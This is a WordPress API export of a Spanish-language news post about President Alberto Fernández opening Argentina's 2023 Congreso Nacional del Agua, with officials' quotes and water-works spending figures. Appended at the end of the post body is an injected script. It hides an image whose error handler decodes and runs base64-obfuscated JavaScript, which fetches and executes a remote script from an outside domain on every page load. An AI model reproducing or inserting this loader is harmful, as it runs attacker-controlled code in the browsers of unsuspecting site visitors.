{"id":7276,"date":"2023-08-28T13:49:33","date_gmt":"2023-08-28T16:49:33","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7276"},"modified":"2025-08-13T15:54:47","modified_gmt":"2025-08-13T18:54:47","slug":"el-presidente-encabezo-la-apertura-del-conagua","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7276","title":{"rendered":"El Presidente encabez\u00f3 la apertura del CONAGUA"},"content":{"rendered":"\n<h5 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#044266\"><em>El presidente Alberto Fern\u00e1ndez encabez\u00f3 este mediod\u00eda en el Centro Cultural Kirchner, junto al ministro de Obras P\u00fablicas, Gabriel Katopodis, la apertura del XXVII Congreso Nacional del Agua (CONAGUA), el encuentro t\u00e9cnico-cient\u00edfico y de gesti\u00f3n del agua de mayor tradici\u00f3n en Argentina, que cubre todas las tem\u00e1ticas dentro de los recursos h\u00eddricos con una perspectiva nacional y federal.<\/em><\/h5>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-large is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg\" alt=\"\" class=\"wp-image-6698\" width=\"305\" height=\"153\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1024x512.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-300x150.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-768x384.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-696x348.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-1068x534.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-840x420.jpg 840w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-320x160.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-480x240.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1-800x400.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/04\/Termatalia-2023-scaled-1.jpg 1440w\" sizes=\"(max-width: 305px) 100vw, 305px\" \/><\/a><figcaption class=\"wp-element-caption\">                        <em><sub><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad:<\/mark><\/sub><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Acompa\u00f1ado tambi\u00e9n por el presidente del INA y del CONAGUA 2023, Juan Carlos Bertoni, el jefe de Estado afirm\u00f3 que \u201cel buen aprovechamiento del agua es un tema central para el ser humano y para la producci\u00f3n. Y ah\u00ed est\u00e1n las prioridades que en pol\u00edtica ocurren. Quienes vemos que lo esencial es mejorar la producci\u00f3n y la calidad de vida de los seres humanos, y los que ven que lo esencial es hacer plata\u201d.\u2028<br>\u201cNosotros creemos que hay que regar la tierra y llevar agua a todas las casas de los argentinos y las argentinas y que por esa v\u00eda vamos a generar mejores condiciones de vida y mejor calidad productiva\u201d, enfatiz\u00f3.<\/p>\n\n\n\n<p>En ese sentido, Alberto Fern\u00e1ndez contrast\u00f3 las obras que impuls\u00f3 la gesti\u00f3n de Macri y el Gobierno nacional en la gesti\u00f3n actual:\u201cAySA de 2015 a 2019 llev\u00f3 adelante 101 obras, mientras que desde 2019 hicimos 1.389 por 376.000 millones de pesos. El Ente Nacional de Obras H\u00eddricas de Saneamiento (ENOHSA) de 2015 a 2019 hizo 28 obras para todo el territorio, mientras que en nuestro per\u00edodo hicimos 2.092, con una inversi\u00f3n de 468.000 millones de pesos para llevar agua y hacer saneamiento de aguas cloacales\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"7279\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-1024x683.jpg\" alt=\"\" class=\"wp-image-7279\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-1536x1025.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-2048x1366.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/1-800x534.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-scaled.jpg\"><img decoding=\"async\" width=\"1024\" height=\"683\" data-id=\"7278\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-1024x683.jpg\" alt=\"\" class=\"wp-image-7278\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-1024x683.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-300x200.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-768x512.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-1536x1025.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-2048x1366.jpg 2048w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-696x464.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-1068x712.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-630x420.jpg 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-320x213.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-480x320.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/2-800x534.jpg 800w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/3-2-scaled.jpg\"><img decoding=\"async\" data-id=\"7280\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/08\/3-2-1024x683.jpg\" alt=\"\" class=\"wp-image-7280\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>\u201cNo todo es lo mismo\u201d, remarc\u00f3 y llam\u00f3 a reflexionar sobre los discursos negacionsistas porque \u201cno solo niegan la existencia del terrorismo de Estado, tambi\u00e9n niegan el cambio climatico, y esto es algo grav\u00edsimo porque la existencia del cambio clim\u00e1tico es cient\u00edfico\u201d.<\/p>\n\n\n\n<p>Es as\u00ed que el jefe de Estado se dirigi\u00f3 a los presentes en el XXVII Congreso Nacional del Agua (CONAGUA) y les pidi\u00f3 \u201cque pongan todo su empe\u00f1o en ver c\u00f3mo afrontamos los desaf\u00edos\u201d para poder hacer \u201cuna mejor Argentina con agua para todos y todas\u201d.<\/p>\n\n\n\n<p>El Ministerio de Obras P\u00fablicas lleva adelante una administraci\u00f3n estrat\u00e9gica de los recursos h\u00eddricos para ampliar el acceso al agua y el saneamiento, que incluye actualmente 3.835 obras y proyectos h\u00eddricos, de las cuales 1.465 se encuentran finalizadas, 1.106 en ejecuci\u00f3n y 1.264 en proyecto. El desarrollo de esos proyectos implic\u00f3 una inversi\u00f3n del Gobierno nacional de 329.818 millones de pesos, un aumento del 936% con respecto a 2019.<\/p>\n\n\n\n<p>Al tomar la palabra, el ministro Katopodis explic\u00f3 que \u201cel agua es un recurso que no est\u00e1 distribuido de una manera equitativa. En Argentina el 80 por ciento del agua est\u00e1 concentrada en el centro del pa\u00eds, lo que marca un territorio diverso pero inequitativo\u201d, y por eso remarc\u00f3 la importancia de \u201cdebatir c\u00f3mo la administraci\u00f3n estrat\u00e9gica, el cuidado y la planificaci\u00f3n nos permiten resolver realidades porque si no est\u00e1 el Estado, si no hay pol\u00edtica p\u00fablica ni una sociedad civil comprometida, probablemente esas inequidades se sigan profundizando\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n resalt\u00f3 la \u201dnecesidad de que la cartera de obras se desarrolle desde un enfoque territorial y se incorpore a los actores locales para discutir, en cada provincia, en cada localidad, c\u00f3mo tenemos que hacer de este recurso, un uso tanto estrat\u00e9gico como cuidado\u201d.<\/p>\n\n\n\n<p>Bajo el lema Hacia una gesti\u00f3n h\u00eddrica sostenible e inclusiva, el evento organizado por el Instituto Nacional del Agua (INA) promueve en esta edici\u00f3n un espacio de di\u00e1logo y colaboraci\u00f3n para compartir experiencias, movilizar la cooperaci\u00f3n y aportar soluciones concretas a diversas escalas para avanzar hacia la sustentabilidad hidroambiental.<\/p>\n\n\n\n<p>Por su parte, el presidente del INA, Juan Carlos Bertoni, destac\u00f3 \u201cel car\u00e1cter nacional y federal del Instituto Nacional del Agua, que hoy est\u00e1 trabajando en las 24 jurisdicciones del pa\u00eds desde un punto de vista social, ambiental e inclusiva\u201d, y valor\u00f3 que \u201cesta expansi\u00f3n y el impulso para su fortalecimiento se debe a los aportes que hemos recibido en esta gesti\u00f3n por parte del Ministerio de Obras P\u00fablicas\u201d.<\/p>\n\n\n\n<p>Los ejes del Congreso Nacional del Agua, que se desarrollar\u00e1 hasta el 30 de agosto como parte de las actividades asociadas a las celebraciones de los primeros 50 a\u00f1os del INA, se encuentran en sinton\u00eda con la Conferencia Mundial del Agua 2023 de Naciones Unidas orientada a evaluar los avances de los pa\u00edses hacia el cumplimiento de la Agenda 2030.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El presidente Alberto Fern\u00e1ndez encabez\u00f3 este mediod\u00eda en el Centro Cultural Kirchner, junto al ministro de Obras P\u00fablicas, Gabriel Katopodis, la apertura del XXVII Congreso Nacional del Agua (CONAGUA), el encuentro t\u00e9cnico-cient\u00edfico y de gesti\u00f3n del agua de mayor tradici\u00f3n en Argentina, que cubre todas las tem\u00e1ticas dentro de los recursos h\u00eddricos con una perspectiva [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7279,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-7276","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-argentina"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7276","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7276"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7276\/revisions"}],"predecessor-version":[{"id":10323,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7276\/revisions\/10323"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7279"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7276"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7276"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7276"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}